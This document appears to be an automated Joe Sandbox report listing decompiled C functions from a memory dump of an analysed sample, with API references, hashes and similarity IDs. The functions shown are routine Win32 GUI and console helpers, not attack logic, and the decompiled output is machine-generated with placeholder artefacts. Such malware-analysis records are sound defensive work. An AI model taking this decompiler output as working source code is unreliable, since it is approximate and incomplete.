Opcode Fuzzy Hash: 1fbb2705a9a7db3af802f3b830efb2a258b345508bdeacd5b1cea67c6ebcd6ca
Instruction Fuzzy Hash: BF01DEB6600218ABCB20AF64DD84AEF73BCDF55700F04406AF946E3200DAB49A48CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2895 Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00CB2895(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				void* __edi;
				void* __esi;
				void* _t27;
				struct HWND__* _t28;
				intOrPtr* _t30;

				_t27 = __ecx;
				_push(E00DEC1A0(0xe4bcbb));
				_t30 = _a8;
				E00CA2CD7(__ebx, _t30, _t27, _t30, 0xe4bcbb);
				_push(_a4);
				if( *((intOrPtr*)(_t27 + 0x70)) != 0) {
					if(E00CB76C2(_t27) != 0) {
						E00CB2D00(_t9, _t30);
					}
				} else {
					_t28 = GetDlgItem( *(_t27 + 0x20), ??);
					if(_t28 != 0) {
						_t5 = GetWindowTextLengthA(_t28) + 1; // 0x1
						GetWindowTextA(_t28, E00CAAD2A(_t30, _t14), _t5);
						E00CA67F5(_t30, 0xffffffff);
					}
				}
				return  *((intOrPtr*)( *_t30 - 0xc));
			}

0x00cb289f
0x00cb28a8
0x00cb28aa
0x00cb28af
0x00cb28b8
0x00cb28bb
0x00cb28fb
0x00cb2900
0x00cb2900
0x00cb28bd
0x00cb28c6
0x00cb28ca
0x00cb28d3
0x00cb28e1
0x00cb28eb
0x00cb28eb
0x00cb28ca
0x00cb290d

APIs

_strlen.LIBCMT ref: 00CB28A2
GetDlgItem.USER32 ref: 00CB28C0
GetWindowTextLengthA.USER32(00000000), ref: 00CB28CD
GetWindowTextA.USER32 ref: 00CB28E1

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: TextWindow$ItemLength_strlen
String ID:
API String ID: 3582222401-0
Opcode ID: c0ca01ae0ae25660cedc74e6cdbd71531cd728749b83639d8f943b7b3b61a681
Instruction ID: 436a044f315763934cb20b4feafabac676f9f07100a9d93e17351315c42421d0
Opcode Fuzzy Hash: c0ca01ae0ae25660cedc74e6cdbd71531cd728749b83639d8f943b7b3b61a681
Instruction Fuzzy Hash: EA01F2316104256F8B057B29DC19CFEB3ADEF9A720B00411AF816972A0EF309D05D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6A21 Relevance: 6.0, APIs: 4, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00CD6A21(intOrPtr __ecx) {
				signed int _v8;
				struct tagRECT _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				int _t20;
				void* _t24;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				signed int _t36;

				_t15 =  *0xe68dd4; // 0x8d2643c2
				_t16 = _t15 ^ _t36;
				_v8 = _t15 ^ _t36;
				_t30 = __ecx;
				if(__ecx != 0 &&  *(__ecx + 0x20) != 0) {
					_push(_t24);
					if( *((intOrPtr*)(__ecx + 0x110)) != 0) {
						_v24.left = 0;
						_v24.top = 0;
						_v24.right = 0;
						_v24.bottom = 0;
						GetClientRect( *(__ecx + 0x20),  &_v24);
						_t30 =  *((intOrPtr*)(_t30 + 0x110));
						_t20 = GetSystemMetrics(0x2d);
						_t16 = SendMessageA( *(_t30 + 0x20), 0x101e, 0, _v24.right - _v24.left - _t20 + _t20 - GetSystemMetrics(2) & 0x0000ffff);
						_t31 = _t31;
					}
					_pop(_t24);
				}
				return E00DDCBCE(_t16, _t24, _v8 ^ _t36, _t29, _t30, _t31);
			}

0x00cd6a27
0x00cd6a2c
0x00cd6a2e
0x00cd6a32
0x00cd6a36
0x00cd6a3e
0x00cd6a47
0x00cd6a4d
0x00cd6a54
0x00cd6a57
0x00cd6a5a
0x00cd6a5d
0x00cd6a66
0x00cd6a71
0x00cd6a92
0x00cd6a98
0x00cd6a98
0x00cd6a99
0x00cd6a99
0x00cd6aa6

APIs

GetClientRect.USER32(00000000,?), ref: 00CD6A5D
GetSystemMetrics.USER32 ref: 00CD6A71
GetSystemMetrics.USER32 ref: 00CD6A7D
SendMessageA.USER32(00000000,0000101E,00000000,00000000), ref: 00CD6A92

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MetricsSystem$ClientMessageRectSend
String ID:
API String ID: 2251314529-0
Opcode ID: db91c82c774f4e667fa306f71292f7fdb710aaf058b65f17484eb9c217f950ef
Instruction ID: 54a65232e131fdabf68d63d62538add3c79aa646415937a8dc7f31b8b54974eb
Opcode Fuzzy Hash: db91c82c774f4e667fa306f71292f7fdb710aaf058b65f17484eb9c217f950ef
Instruction Fuzzy Hash: 65018272A00209AFCB048FB9DD455AEF7B4FB08701F51422BE955B3640CB706E04CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00CE70E3 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CE70E3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t30;
				void* _t32;
				struct HBRUSH__* _t37;
				intOrPtr _t45;
				void* _t49;

				_push(8);
				E00DDD52C(0xe0ad61, __ebx, __edi, __esi);
				_t45 =  *((intOrPtr*)(_t49 + 8));
				if( *(_t49 + 0x20) != 0xffffffff) {
					 *(_t49 - 0x10) =  *(_t49 - 0x10) & 0x00000000;
					 *((intOrPtr*)(_t49 - 0x14)) = 0xe1966c;
					 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
					E00CB9BC6(__ebx, _t49 - 0x14, _t45, CreateSolidBrush( *(_t49 + 0x20)));
					FillRect( *(_t45 + 4), _t49 + 0x10,  *(_t49 - 0x10));
					 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t49 - 0x14)) = 0xe1966c;
					_t30 = E00CB91F0(_t49 - 0x14, __edx);
				} else {
					_t37 = E00CC19ED() + 0xd0;
					if(_t37 != 0) {
						_t37 =  *(_t37 + 4);
					}
					_t30 = FillRect( *(_t45 + 4), _t49 + 0x10, _t37);
				}
				if( *((intOrPtr*)(_t49 + 0x24)) == 0) {
					_t32 = E00CC19ED();
					_t30 = E00CC0750(_t49 + 0x10,  *((intOrPtr*)(E00CC19ED() + 0x5c)),  *((intOrPtr*)(_t32 + 0x58)));
				}
				return E00DDD4FA(_t30);
			}

0x00ce70e3
0x00ce70ea
0x00ce70f3
0x00ce70f6
0x00ce7117
0x00ce7120
0x00ce7126
0x00ce7134
0x00ce7143
0x00ce7149
0x00ce7150
0x00ce7153
0x00ce70f8
0x00ce70fd
0x00ce7102
0x00ce7104
0x00ce7104
0x00ce710f
0x00ce710f
0x00ce715c
0x00ce715e
0x00ce7176
0x00ce7176
0x00ce7180

APIs

__EH_prolog3.LIBCMT ref: 00CE70EA
FillRect.USER32 ref: 00CE710F
CreateSolidBrush.GDI32(000000FF), ref: 00CE712A
FillRect.USER32 ref: 00CE7143

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: FillRect$BrushCreateH_prolog3Solid
String ID:
API String ID: 1242064992-0
Opcode ID: 4fa96642dd280734ab476d6500fc15d09f4b81fde7ddee2a35dcc433856d24a0
Instruction ID: 6f2edece4d71bc22b1becb42b3bf71601ddfebe9fcdc76e0c89461bcd6219895
Opcode Fuzzy Hash: 4fa96642dd280734ab476d6500fc15d09f4b81fde7ddee2a35dcc433856d24a0
Instruction Fuzzy Hash: D7111C718002499FCF11EF91CD0AEEE7BB9FF05315F144219F465A71A2CB349A14DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB52F8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00CB52F8(void* __ebx, void* __ecx, void* __edx, void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				struct HWND__* _t26;

				_t25 = __edi;
				_t24 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t26 = _t16;
					if(_t26 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t26, _a8, _a12, _a16);
					} else {
						_t20 = E00CB27A9(_t23, _t25, __eflags, _t26);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E00CB0C1C(_t22, _t24, _t25, _t26, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t26);
						__eflags = _t18;
						if(_t18 != 0) {
							E00CB52F8(_t22, _t23, _t24, _t25, _t26, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t26, 2);
				}
				return _t16;
			}

0x00cb52f8
0x00cb52f8
0x00cb52f8
0x00cb52f8
0x00cb52ff
0x00cb536a
0x00cb536a
0x00cb536e
0x00000000
0x00000000
0x00cb5307
0x00cb530b
0x00cb5335
0x00cb530d
0x00cb530e
0x00cb5313
0x00cb5315
0x00cb5317
0x00cb531a
0x00cb531d
0x00cb5320
0x00cb5323
0x00cb5324
0x00cb5324
0x00cb5315
0x00cb533b
0x00cb533f
0x00cb5342
0x00cb5348
0x00cb534a
0x00cb535c
0x00cb535c
0x00cb534a
0x00cb5364
0x00cb5364
0x00cb5372

APIs

GetTopWindow.USER32(?), ref: 00CB52FF
GetTopWindow.USER32(00000000), ref: 00CB5342
GetWindow.USER32(00000000,00000002), ref: 00CB5364

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: b43f83506ccdb6ba5771a105052e21ae7a7d73a4342580a1745d894f4a4b7fe8
Instruction ID: 648a8eb492135f2f940695122c100336e8fca6d7349df9cddf9812822e8cb9c9
Opcode Fuzzy Hash: b43f83506ccdb6ba5771a105052e21ae7a7d73a4342580a1745d894f4a4b7fe8
Instruction Fuzzy Hash: B201E532005A1AEBCF125F929C09EDE3FA9AF08391F048014FA2164171C776CAA1EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB281E Relevance: 6.0, APIs: 4, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00CB281E(void* __ebx, void* __ecx, void* __edx, void* __edi, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t16 = __edi;
				_t15 = __edx;
				_t14 = __ecx;
				_t13 = __ebx;
				_t17 = GetDlgItem(_a4, _a8);
				if(_t17 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t18 = _t10;
						__eflags = _t18;
						if(_t18 == 0) {
							goto L10;
						}
						_t10 = E00CB281E(_t13, _t14, _t15, _t16, _t18, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t18, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t17) == 0) {
						L3:
						_push(_t17);
						if(_a12 == 0) {
							return E00CB277F(_t13, _t14, _t15);
						}
						_t10 = E00CB27A9(_t14, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E00CB281E(__ebx, _t14, _t15, __edi, _t17, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x00cb281e
0x00cb281e
0x00cb281e
0x00cb281e
0x00cb282e
0x00cb2832
0x00cb2866
0x00cb2869
0x00cb288a
0x00cb288a
0x00cb288c
0x00cb288e
0x00000000
0x00000000
0x00cb2878
0x00cb287d
0x00cb287f
0x00cb2884
0x00000000
0x00cb2884
0x00000000
0x00cb287f
0x00cb2834
0x00cb283d
0x00cb284f
0x00cb2853
0x00cb2854
0x00000000
0x00cb2856
0x00cb285d
0x00cb2862
0x00cb2864
0x00000000
0x00000000
0x00cb283f
0x00cb2846
0x00cb284d
0x00000000
0x00000000
0x00cb284d
0x00cb283d
0x00cb2892
0x00cb2892

APIs

GetDlgItem.USER32 ref: 00CB2828
GetTopWindow.USER32(00000000), ref: 00CB2835

Part of subcall function 00CB281E: GetWindow.USER32(00000000,00000002), ref: 00CB2884

GetTopWindow.USER32(?), ref: 00CB2869

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 1f0da2f0f31ef84722b15bb0e7780a01efa8fdb3843cc3ce9d0edc8f36ed51f8
Instruction ID: cf1e79f242c78f076c1e057367dc03858b474771cafbea3fb06e244881cb8fbb
Opcode Fuzzy Hash: 1f0da2f0f31ef84722b15bb0e7780a01efa8fdb3843cc3ce9d0edc8f36ed51f8
Instruction Fuzzy Hash: C7018133401626BBCF222F62CC04AEE3B68AF25791F008020FD25A40A0DB33CE51A695

Uniqueness

Uniqueness Score: -1.00%

Function 00CB77B6 Relevance: 6.0, APIs: 4, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00CB77B6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t23;
				int _t26;
				void* _t36;
				CHAR* _t40;
				void* _t41;

				_push(4);
				E00DDD52C(0xe08583, __ebx, __edi, __esi);
				_t36 = __ecx;
				_t26 = 0;
				if( *((intOrPtr*)(__ecx + 0x74)) != 0) {
					E00CA67E1(_t41 - 0x10);
					_t37 =  *((intOrPtr*)(_t36 + 0x74));
					 *((intOrPtr*)(_t41 - 4)) = 0;
					 *0xe17a64(_t41 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x74)))) + 0x8c))))();
					_t40 =  *(_t41 + 8);
					_t21 = E00CA4F80(0,  *((intOrPtr*)(_t36 + 0x74)), _t37, _t40, E00DEC22B(_t40,  *(_t41 + 0xc),  *((intOrPtr*)(_t41 - 0x10)), 0xffffffff));
					if(_t40 != 0) {
						_t26 = E00DEC1A0(_t40);
					}
					E00CA2975(_t21,  *((intOrPtr*)(_t41 - 0x10)) + 0xfffffff0);
					_t23 = _t26;
				} else {
					_t23 = GetWindowTextA( *(__ecx + 0x20),  *(_t41 + 8),  *(_t41 + 0xc));
				}
				return E00DDD4FA(_t23);
			}

0x00cb77b6
0x00cb77bd
0x00cb77c2
0x00cb77c4
0x00cb77c9
0x00cb77df
0x00cb77e4
0x00cb77eb
0x00cb77f8
0x00cb7800
0x00cb7802
0x00cb7814
0x00cb781e
0x00cb7827
0x00cb7827
0x00cb782f
0x00cb7834
0x00cb77cb
0x00cb77d4
0x00cb77d4
0x00cb783b

APIs

__EH_prolog3.LIBCMT ref: 00CB77BD
GetWindowTextA.USER32 ref: 00CB77D4
__cftof.LIBCMT ref: 00CB780E
_strlen.LIBCMT ref: 00CB7821

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3TextWindow__cftof_strlen
String ID:
API String ID: 721212129-0
Opcode ID: 28c8d717487e21e89b63e206513342ec70755121ec28f28acef6249d4a257eed
Instruction ID: efe4d530a7cbfd0fab67622e3e4d53e5c18c745a615067f1f3467e9c2c2d5eb5
Opcode Fuzzy Hash: 28c8d717487e21e89b63e206513342ec70755121ec28f28acef6249d4a257eed
Instruction Fuzzy Hash: 5401B176604126AFCF05BFB8DC458AD7772FF48314B044229F9266B3A2CF309A15DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CD11AD Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CD11AD(void* __ecx) {
				void* _t15;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t29;
				intOrPtr* _t31;
				void* _t33;

				_t33 = __ecx;
				_t29 =  *((intOrPtr*)(__ecx + 0xc4));
				if(_t29 != 0) {
					_t2 = _t33 + 0x30; // 0x30
					InvalidateRect( *(_t29 + 0x20), _t2, 1);
					_t18 =  *((intOrPtr*)(_t33 + 0xc8));
					if(_t18 != 0 &&  *((intOrPtr*)(_t18 + 0x6c)) != 0) {
						InvalidateRect( *( *((intOrPtr*)(_t33 + 0xc4)) + 0x20), _t18 + 0x30, 1);
					}
					if( *((intOrPtr*)(_t33 + 0x6c)) == 0) {
						L9:
						return UpdateWindow( *( *((intOrPtr*)(_t33 + 0xc4)) + 0x20));
					} else {
						_t31 =  *((intOrPtr*)(_t33 + 0xd0));
						while(_t31 != 0) {
							_t21 =  *((intOrPtr*)(_t31 + 8));
							_t31 =  *_t31;
							InvalidateRect( *( *((intOrPtr*)(_t33 + 0xc4)) + 0x20), _t21 + 0x30, 1);
						}
						goto L9;
					}
				}
				return _t15;
			}

0x00cd11ae
0x00cd11b0
0x00cd11b8
0x00cd11bc
0x00cd11c3
0x00cd11c9
0x00cd11d1
0x00cd11e8
0x00cd11e8
0x00cd11f2
0x00cd121c
0x00000000
0x00cd11f4
0x00cd11f5
0x00cd1217
0x00cd11fd
0x00cd1200
0x00cd1211
0x00cd1211
0x00000000
0x00cd121b
0x00cd11f2
0x00cd122c

APIs

InvalidateRect.USER32(?,00000030,00000001,00000000,00CCD8C3), ref: 00CD11C3
InvalidateRect.USER32(?,?,00000001), ref: 00CD11E8
InvalidateRect.USER32(?,?,00000001), ref: 00CD1211
UpdateWindow.USER32(?), ref: 00CD1225

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: InvalidateRect$UpdateWindow
String ID:
API String ID: 488614814-0
Opcode ID: 3002f25594d8b4ce6b9c5faa7b04f22b1d9e053c34cecf34b23901d18ed58fb7
Instruction ID: bc6aa03fb4cccc4f10e3bc49a25590f70bebdd6016d6af70a44a39656f8de4b1
Opcode Fuzzy Hash: 3002f25594d8b4ce6b9c5faa7b04f22b1d9e053c34cecf34b23901d18ed58fb7
Instruction Fuzzy Hash: E1014832211600AFE7208F59DD44F96B7B5BF08711F09455AEA9AD72B0C771E840CF00

Uniqueness

Uniqueness Score: -1.00%

Function 00CC92D2 Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00CC92D2(void* __ecx, long _a8, intOrPtr _a12) {
				struct tagPOINT _v12;
				void* __ebp;
				int _t19;
				void* _t23;
				void* _t28;

				_t24 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t28 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x8c)) == 0) {
					_t26 = _a12;
					_v12.x = _a8;
					_v12.y = _a12;
					ScreenToClient( *(__ecx + 0x20),  &_v12);
					_push(_v12.y);
					_t19 = PtInRect(_t28 + 0x94, _v12);
					_t31 = _t19;
					if(_t19 != 0) {
						E00CB277F(_t23, _t24, _t26, SetCapture( *(_t28 + 0x20)));
						 *((intOrPtr*)(_t28 + 0x88)) = 1;
						RedrawWindow( *(_t28 + 0x20), 0, 0, 0x401);
					}
				}
				return E00CB236A(_t23, _t28, _t31);
			}

0x00cc92d2
0x00cc92d5
0x00cc92d6
0x00cc92d8
0x00cc92e1
0x00cc92e6
0x00cc92e9
0x00cc92f3
0x00cc92f6
0x00cc92fc
0x00cc9309
0x00cc930f
0x00cc9311
0x00cc931d
0x00cc932e
0x00cc9338
0x00cc9338
0x00cc9311
0x00cc9347

APIs

ScreenToClient.USER32 ref: 00CC92F6
PtInRect.USER32(?,?,?), ref: 00CC9309
SetCapture.USER32(?), ref: 00CC9316
RedrawWindow.USER32(?,00000000,00000000,00000401,00000000), ref: 00CC9338

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CaptureClientRectRedrawScreenWindow
String ID:
API String ID: 2178243973-0
Opcode ID: 0b19a5aeaba23525e5ce9dc07c18fff0e356865d21983c340a35e7d25228383b
Instruction ID: da5868b9da481a0e1ec0357c17fe3b49a4487c5db485abb1fd25ff83aec5575e
Opcode Fuzzy Hash: 0b19a5aeaba23525e5ce9dc07c18fff0e356865d21983c340a35e7d25228383b
Instruction Fuzzy Hash: DC016271504708EFDB209F61CC49FCE7BB9FB04710F008459F595A22A0DB74A6549B50

Uniqueness

Uniqueness Score: -1.00%

Function 00E068C5 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00E068C5(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xe69840, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00E068AE();
					E00E06870();
					_t13 = WriteConsoleW( *0xe69840, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x00e068e2
0x00e068e6
0x00e068f3
0x00e068f8
0x00e06913
0x00e06913
0x00e06919

APIs

WriteConsoleW.KERNEL32(00000000,4EFB6845,00000000,00000000,00000000,?,00E045B9,00000000,00000001,00000000,00000000,?,00DF73B7,?,4EFB6839,00000000), ref: 00E068DC
GetLastError.KERNEL32(?,00E045B9,00000000,00000001,00000000,00000000,?,00DF73B7,?,4EFB6839,00000000,?,00000000,?,00DF7903,00000000), ref: 00E068E8

Part of subcall function 00E068AE: CloseHandle.KERNEL32(FFFFFFFE,00E068F8,?,00E045B9,00000000,00000001,00000000,00000000,?,00DF73B7,?,4EFB6839,00000000,?,00000000), ref: 00E068BE

___initconout.LIBCMT ref: 00E068F8

Part of subcall function 00E06870: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00E0689F,00E045A6,00000000,?,00DF73B7,?,4EFB6839,00000000,?), ref: 00E06883

WriteConsoleW.KERNEL32(00000000,4EFB6845,00000000,00000000,?,00E045B9,00000000,00000001,00000000,00000000,?,00DF73B7,?,4EFB6839,00000000,?), ref: 00E0690D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 633db2e1aa884289d5d1f41448e3d8e5595ef9ebd2fbc38459f175a21d1cb10e
Instruction ID: 715a75d1eb2e81956dd2a22a062d319ee30b73ccafef406b300c2b65daba02b4
Opcode Fuzzy Hash: 633db2e1aa884289d5d1f41448e3d8e5595ef9ebd2fbc38459f175a21d1cb10e
